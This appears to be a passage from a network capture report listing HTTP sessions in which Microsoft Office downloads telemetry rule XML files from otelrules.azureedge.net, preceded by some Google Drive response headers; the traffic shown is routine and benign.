                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-QoSTUgD37SrsAA6sGE7ANg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        111 | 192.168.2.5 | 49912 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:52 UTC | 192 | OUT | GET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:53 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 174
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                        ETag: "0x8DC582B91D80E15"
                                                                                        x-ms-request-id: e8edc24c-801e-0083-0ecc-45f0ae000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215053Z-1746fd949bdjrnwqhC1EWRpg28000000037g00000000y05r
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:53 UTC | 174 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        112 | 192.168.2.5 | 49913 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:53 UTC | 192 | OUT | GET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:54 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1952
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                        ETag: "0x8DC582B956B0F3D"
                                                                                        x-ms-request-id: 3e1c70e6-d01e-0028-76c3-457896000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215054Z-1746fd949bd4w8sthC1EWR7004000000032000000000bsh5
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:54 UTC | 1952 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        113 | 192.168.2.5 | 49916 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:53 UTC | 192 | OUT | GET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:54 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 958
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                                        x-ms-request-id: 4927bbd2-c01e-000b-53cc-45e255000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215054Z-1746fd949bdtlp5chC1EWRq1v4000000033g000000010dsf
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:54 UTC | 958 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        114 | 192.168.2.5 | 49917 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:54 UTC | 192 | OUT | GET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:54 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 501
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                        x-ms-request-id: d9e4b0b5-a01e-006f-29a0-4613cd000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215054Z-1746fd949bdkw94lhC1EWRxuz400000003hg000000001rty
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:54 UTC | 501 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        115 | 192.168.2.5 | 49918 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:54 UTC | 193 | OUT | GET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:54 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2592
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                        ETag: "0x8DC582BB5B890DB"
                                                                                        x-ms-request-id: 8db94728-c01e-0034-79d1-452af6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215054Z-1746fd949bd2cq7chC1EWRnx9g00000002z0000000009pmn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:54 UTC | 2592 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        116 | 192.168.2.5 | 49919 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:55 UTC | 192 | OUT | GET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:55 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:55 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 3342
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                        ETag: "0x8DC582B927E47E9"
                                                                                        x-ms-request-id: c43eeb18-901e-008f-6ecb-4567a6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215055Z-1746fd949bdwt8wrhC1EWRu6rg00000003dg00000000hyh8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:55 UTC | 3342 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        117         192.168.2.5  49924        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:50:56 UTC  193                OUT        GET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:56 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2284
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                        x-ms-request-id: dea1083a-301e-0051-14cb-4538bb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215056Z-1746fd949bd54zxghC1EWRzre400000003fg00000000u3k1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:56 UTC  2284               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        118         192.168.2.5  49926        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:50:56 UTC  192                OUT        GET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:56 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1393
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                                        x-ms-request-id: 5bdbb5de-801e-0067-47cb-45fe30000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215056Z-1746fd949bdlnsqphC1EWRurw00000000370000000004h7p
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:56 UTC  1393               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        119         192.168.2.5  49927        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:50:56 UTC  192                OUT        GET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:56 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1356
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                        ETag: "0x8DC582BDC681E17"
                                                                                        x-ms-request-id: 55cb7248-101e-0017-4fd4-4547c7000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215056Z-1746fd949bdzd2qvhC1EWRcygw000000032000000000bkwt
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:56 UTC  1356               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        120         192.168.2.5  49928        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:50:56 UTC  192                OUT        GET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:56 UTC  495                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1393
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                                        x-ms-request-id: 2e94d759-201e-005d-705f-47afb3000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215056Z-1746fd949bd5gpk5hC1EWR8dk400000000sg0000000039h5
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_MISS
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:56 UTC  1393               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        121         192.168.2.5  49929        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:50:57 UTC  192                OUT        GET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:57 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:57 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1356
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                        ETag: "0x8DC582BDF66E42D"
                                                                                        x-ms-request-id: a7ca5163-201e-0071-37c7-46ff15000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215057Z-1746fd949bdhk6hphC1EWRaw3c000000031g00000000g0rd
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:57 UTC  1356               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        122         192.168.2.5  49932        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:50:58 UTC  192                OUT        GET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:59 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1358
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BE022ECC5"
                                                                                        x-ms-request-id: 6982332e-a01e-0021-2091-46814c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215058Z-1746fd949bdzd2qvhC1EWRcygw000000030g00000000g5nw
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:59 UTC  1358               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        123         192.168.2.5  49933        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:50:58 UTC  192                OUT        GET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:59 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1395
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                        ETag: "0x8DC582BDE12A98D"
                                                                                        x-ms-request-id: 2e27a562-801e-00a0-79cb-452196000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215058Z-1746fd949bdb8xvchC1EWRmbd4000000036000000000q4rs
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:59 UTC  1395               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        124         192.168.2.5  49930        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:50:58 UTC  192                OUT        GET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:59 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1395
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BE017CAD3"
                                                                                        x-ms-request-id: 4ebcc1fc-101e-0028-09cb-458f64000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215058Z-1746fd949bd7wvgbhC1EWR0rgs00000003dg00000000413v
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:59 UTC  1395               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        125         192.168.2.5  49931        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:50:58 UTC  192                OUT        GET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:59 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1358
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                        ETag: "0x8DC582BE6431446"
                                                                                        x-ms-request-id: 24de3c9e-c01e-00a1-13b3-467e4a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215058Z-1746fd949bddgsvjhC1EWRum2c00000003ng000000003es7
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:59 UTC  1358               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        126         192.168.2.5  49934        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:50:59 UTC  192                OUT        GET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:59 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:59 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1389
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                                        x-ms-request-id: 6b7594f7-701e-001e-76bc-46f5e6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215059Z-1746fd949bdqpttnhC1EWRe1wg00000002z000000000ss0m
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:59 UTC  1389               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        127         192.168.2.5  49935        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:51:01 UTC  192                OUT        GET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:01 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:01 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1352
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                                        x-ms-request-id: 88657856-001e-008d-2ccc-45d91e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215101Z-1746fd949bdkw94lhC1EWRxuz400000003gg000000005zek
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:01 UTC  1352               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        128         192.168.2.5  49936        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:51:01 UTC  192                OUT        GET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
